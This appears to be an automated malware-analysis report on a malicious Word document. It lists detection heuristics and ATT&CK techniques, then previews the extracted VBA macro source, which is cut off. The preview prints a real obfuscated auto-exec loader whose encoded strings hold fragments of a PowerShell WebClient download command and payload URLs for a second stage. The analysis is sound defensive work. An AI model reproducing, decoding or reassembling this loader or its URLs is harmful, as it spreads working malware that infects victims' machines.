Verdict: MALICIOUS
Risk Score: 302

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() calls and custom decoding. The primary function of the script appears to be downloading and executing a second-stage payload from a URL that is partially reconstructed from concatenated strings.
Heuristics: 8
- ClamAV: Doc.Dropper.Agent-6448733-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6448733-0
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23928 bytes |

SHA-256: d16c95d66b098c687837c632d774dce5dafbe87981588802f1b99c58c2fb7218
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aiNiCfrApT"
Function NilCSnTOVHMwK()
On Error Resume Next
owdYRmm = (wrkjm - Int(uutrvYwRWwBJLZ) * zfFBMWMIi / Oct(pOhULG) - (wkSafsUrDT - Sin(9032657)))
OLIWFUI = (HKnsiw - Int(ffZZhlL) * FJRwKrYKaGw / Oct(mkJJCRCa) - (BVCYzbwYLkoUKO - Sin(6457550)))
wnQSWfVuRuo = (XkOjzMlhbYuV - Int(XQjkjDoO) * LQamPVIAc / Oct(cYfhorzpj) - (wajcInUFj - Sin(5179867)))
wYquM = (PBkREJTwR) + HJjkJKD("IKKZnKoWNf8+Nf8RENf8+Nf8xBR6uK8+uK8'+'/?htNf8+Nf8tp:/pv2+pv2/Nf8+Nf8www.socNf8+Nf8iNf8zItPZjLPXYjFBkEptRmqbOwkYwiYsi", 9, 78)
uzcNl = (bkjzdbBDQBLiB - Int(IqhlsUwViIj) * vmKqqwpd / Oct(oOMkVOVKu) - (LqLaELz - Sin(4323733)))
ZRVrm = (zFGaOMfPtaK - Int(tXIUbVB) * FaLjwYakL / Oct(frZFjS) - (owXpzckkwRT - Sin(546714)))
cqupBTwPKPh = (cpwziX - Int(XipmvDnuTpnrq) * nXdhGzbzzGHh / Oct(cptZaJ) - (KJIltwppQ - Sin(1363550)))
GXzvXnoiN = (PZawYtrrivtkOE) + HJjkJKD("zKNLAce(Nf8JskNf8,[sTrIng][cHaR]39)) pv2)uK8+uK8.rePlacE(pv2Nf8pv2,[sTRInG][CHar]39).rePlacE(([CHar]116+[CHaruK8+uK8]uK8+uK854+[CHar]113)'+',[sTRInG][CHaSHZlQPzz", 4, 150)
Vuhbw = (SbdPrnJHlis - Int(fVmnYYHCjF) * fYGfzdkqrRtt / Oct(LCdfOSjomHztK) - (jBIKzMowq - Sin(7033970)))
RjIuzkUoNb = (KiBsBK - Int(bvbVvcnQZwtR) * moFDoi / Oct(uhDNLs) - (DofwkzNRP - Sin(9317622)))
ijiLnqsp = (GjWimpF - Int(cVWYzESDq) * rOKCFkcuCITuU / Oct(JshCkMuNH) - (PBhPhrSuWYXh - Sin(201825)))
hKnzOp = (ijiOzLEaQM) + HJjkJKD("LbcHaR]54),[sTrIng][cHaAcvBHtAXZVwvHrPRPF", 3, 21)
ZKTUL = (DCNNKqZXwCbr - Int(bzHCZKjhAl) * cUBbs / Oct(tadRXksfd) - (fLEtnN - Sin(8810826)))
NoHHGbAJM = (VWwDwrFDQMkqo - Int(iXIAOLDNPXwDAV) * rNPaLGWcpilLUT / Oct(umShhhlmwhl) - (HZHtqk - Sin(1430390)))
Ekpld = (zUPdsHvSW - Int(AjujcKlTnO) * aQsZwP / Oct(ilvbM) - (jZWooZlSQVhCN - Sin(4461011)))
Gmworjn = (FiBwOEXQSdzdHX) + HJjkJKD("VJ+uK8f8+Nf8Jsk+JNf8+NfuK8+u'+'K88skeJskpv2+uK8+u'+'K8pv2+Nf8+NuK8+uK8f8Jpv2+uzHRmZsBsVn", 3, 76)
QBBTJCl = (vKXlsFl - Int(YfTbHVzluh) * jioJfNTvJLriQ / Oct(NIMjIAnzII) - (DYvjnKkjjEjGB - Sin(8429597)))
crocEE = (YJbRhwDwu - Int(nFmhFlW) * PcpYOWAGBja / Oct(CLolbdVqbwz) - (BTAFwzdTJb - Sin(7218485)))
JozEbIlOX = (iAvFRav - Int(WMLbQBFbP) * ETcNWvWuICC / Oct(YaZYDb) - (QZABcFpIYpz - Sin(8735314)))
CWsKABHjjP = (hYWzDCnwfOcn) + HJjkJKD("PqKlmExNf8+Nf8wnNf'+'8+Nf8sNf8+Nf8adasdNfpv2+pv28+uK8+uK8'+'Nf8 '+'= &(Jspv2+pv2Nf8+Nf8knNuK8JXullN", 7, 87)
qsYDBsLj = (rzisw - Int(DRAIhn) * FLJADuDHmiwjhC / Oct(IHpBXVzzPJE) - (TAlLvLlQG - Sin(6835758)))
iHOKQSs = (MtjvFPfJ - Int(EUIsTjPc) * MtqwXj / Oct(AXDXwl) - (ZncIraskjA - Sin(7562250)))
BjihzEAtdml = (zrtrPwII - Int(pdOVwoErclVSs) * EqXXBPbKqKF / Oct(PHfnbndhjKOn) - (mnsHOSAHIoBrYH - Sin(8690341)))
CEWQcd = (dzjWRsUPnk) + HJjkJKD("VimbuzjTEwDf8uK8+uK8+Nf8u/XEZ8sF/JskNfpv2+pv28+Nf8.SplNpv2'+'+pv2f'+'8+Nf8it(JsuK8+uK8k?JsuK8+uK8k)Nf8+Nf8;3Nf8+Nf8xw'+'SDC =Nf8+NfuK8+uK88 3xwNf8+Npv2+pv'+'2f8env'zjBAjB", 12, 153)
FXrJGJCSUzk = (sEdGSivDfj - Int(DYLXjNq) * SEkLzIuZHvs / Oct(jdJKKiSi) - (sHBFvwUQMtB - Sin(7167638)))
BRhufLAkEqt = (kYHtf - Int(YFoHnSfaPAMAuM) * ZzjGBMZIvBrjht / Oct(CRCTGcEzOmQV) - (QztGZD - Sin(1967634)))
VKuqOL = (YnimwwsFvm - Int(hdzvzbGWVzUTlq) * rvIkHdiJ / Oct(iYjHfLtSAS) - (bSDvfSjpdDTs - Sin(9243709)))
idTJuBHS = (KhpKztckcObjC) + HJjkJKD("mnKlazmf8+Nf8suK8+uK8kpv2+pv2-Nf8+Nf8objNf8+Nf8ectJ'+'sk)Nf8+pv2+pvuK8+uK82Nf8 SNf8+Nf8pv2+pv2ystem.Net.N'+'uK8+uK8f8+Nf8wTKlkqajJtjKidCpZmXIXE", 8, 114)
MNbuzAM = (sMFoztjaK - Int(kdaPvHUwoHz) * XkUpfZBzYtmj / Oct(kFrWF) - (sHsJVRuIvzVO - Sin(6949187)))
lOvii = (GpVTINGZL - Int(rqtKLB) * bjUGifawYl / Oct(GADiCGwv) - (XOrhTvkSiXjz - Sin(8751392)))
zziwa = (tiQSbJuUk - Int(pSKEMomMPR) * Nrmmiu / Oct(TACTMi) - (zmnWlq - Sin(501135)))
JZipY = (uwrJECTTCs) + HJjkJKD("LzjFRrra.com/1RurEqNf8+Nf8F/Nf8+Nf8?httuK8+'+'uK8p://mNf8+Nf8cfNf8+Nf821.ruK8+uK8uNuK8+uK8f8+Npv2+pv2f8pv2+pv2/LaZEJ", 7, 106)
Jmqt
```

... (truncated)